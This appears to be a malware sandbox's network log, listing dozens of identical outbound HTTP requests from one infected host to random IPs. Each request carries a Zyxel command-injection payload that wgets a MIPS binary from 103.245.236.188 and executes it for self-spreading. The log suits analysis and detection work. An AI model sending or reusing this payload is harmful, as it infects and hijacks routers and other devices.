                                    Jan 13, 2024 19:02:51.588990927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8762192.168.2.134436066.236.165.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589050055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8763192.168.2.1357110113.69.59.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589123964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8764192.168.2.134859241.47.154.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589159966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8765192.168.2.1354348163.136.246.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589198112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8766192.168.2.133981440.25.158.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589236021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8767192.168.2.1343750221.192.121.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589293003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8768192.168.2.1349118123.21.222.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589349031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8769192.168.2.1349950200.168.195.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589407921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8770192.168.2.133840427.165.72.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589468956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8771192.168.2.1348338108.17.152.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589531898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8772192.168.2.1360000179.68.205.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589587927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8773192.168.2.135531647.129.203.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589644909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8774192.168.2.134018887.201.123.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589673042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8775192.168.2.1355590212.38.93.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589751959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8776192.168.2.1343146117.118.179.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589808941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8777192.168.2.1341996122.53.61.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589890957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8778192.168.2.133687897.22.14.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589931011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8779192.168.2.1337014188.74.246.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.589987993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8780192.168.2.1336978202.186.104.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590024948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8781192.168.2.134209479.222.240.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590063095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8782192.168.2.134321697.64.162.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590101004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8783192.168.2.135158099.124.26.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590128899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8784192.168.2.1352546142.150.71.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590219021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8785192.168.2.1354858104.13.175.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590254068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8786192.168.2.1341044117.153.255.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590318918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8787192.168.2.1335132164.62.148.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590363026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8788192.168.2.134811268.176.11.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590404034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8789192.168.2.1336908193.252.130.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590457916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8790192.168.2.1353990115.148.200.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590486050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8791192.168.2.135886091.22.125.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590558052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8792192.168.2.1352036125.179.214.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590622902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8793192.168.2.135754079.188.219.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590653896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8794192.168.2.134897084.39.154.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590707064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8795192.168.2.134812023.8.53.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590775013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8796192.168.2.133771419.66.110.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590801001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8797192.168.2.133925251.199.64.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590886116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8798192.168.2.1340420179.166.167.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590939045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8799192.168.2.1351422116.123.71.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.590996981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8800192.168.2.13417685.83.213.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591037989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8801192.168.2.1338350137.160.127.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591109037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8802192.168.2.135752883.141.196.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591161013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8803192.168.2.1340706186.153.104.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591231108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8804192.168.2.1339936130.168.187.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591257095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8805192.168.2.134235050.97.242.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591348886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8806192.168.2.135671637.54.172.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591415882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8807192.168.2.135805671.164.186.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591449022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8808192.168.2.13428888.196.15.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591501951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8809192.168.2.134323061.159.192.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591562033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8810192.168.2.1337940159.170.125.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591612101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8811192.168.2.134252814.43.135.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591675043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8812192.168.2.1355466170.242.74.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591752052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8813192.168.2.1347668195.111.161.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591809034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8814192.168.2.1341402126.18.216.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591892004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8815192.168.2.135444419.122.123.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591953993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8816192.168.2.1338896108.35.148.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.591999054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8817192.168.2.1340052178.226.136.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592053890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8818192.168.2.1347658182.233.72.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592113972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8819192.168.2.135448466.252.232.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592164993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8820192.168.2.1354164222.16.233.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592195988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8821192.168.2.1344442196.129.160.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592232943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8822192.168.2.135559032.92.74.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592297077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8823192.168.2.1347886163.56.234.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592330933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8824192.168.2.1354916181.169.37.180443
                                    TimestampBytes transferredDirectionData
